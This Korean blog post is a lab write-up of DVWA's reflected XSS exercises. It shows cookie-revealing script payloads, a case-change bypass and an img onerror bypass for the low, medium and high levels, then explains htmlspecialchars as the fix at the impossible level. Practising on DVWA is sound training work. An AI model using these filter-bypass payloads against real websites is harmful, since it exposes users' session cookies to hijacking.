728x90
반응형
XSS - low
XSS(Reflected) [security level low] |
https://isc9511.tistory.com/19 이론 참고 |
사용자가 입력하는 값을 받아서 앞에 hello 라고 응답함![]() |
<script>alert(document.cookie)</script> |
![]() 웹브라우저 쿠키가 출력이 됨 (반사형) |
XSS (Reflected) Source![]() |
XSS - medium
MEDIUM |
<script>alert(document.cookie)</script> |
![]() |
XSS (Reflected) Source![]() |
<SCRIPT>alert(document.cookie)</SCRIPT> |
![]() 아까와 같이 script를 다 대문자로 바꾸니 또 쿠키가 잘 뜬다. |
XSS - high
HIGH |
XSS (Reflected) Source![]() |
<img src=x onerror=alert(document.cookie)> |
![]() |
XSS - impossible
IMPOSSIBLE |
XSS (Reflected) Source![]() |
htmlspecilchars 함수의 역할 & → & > → < “ → " 로 변환이 됨. ex) <script> 라고 입력시에 <script<라고 인식됨 img src를 넣어도 꺽쇠가 들어가기 때문에 인식 안됨 다른 취약점들과 연계시에 가능한 방법도 있을거임 |
728x90
반응형
'해킹 > DVWA 모의해킹' 카테고리의 다른 글
DVWA - stored XSS (low, medium, high) (0) | 2023.04.16 |
---|---|
DVWA - File Upload (low, medium, high) (0) | 2023.04.16 |
DVWA - Level High File Inclusion (0) | 2023.04.16 |
DVWA - Level Medium File Inclusion (0) | 2023.04.16 |
DVWA - Level Low File Inclusion (0) | 2023.04.16 |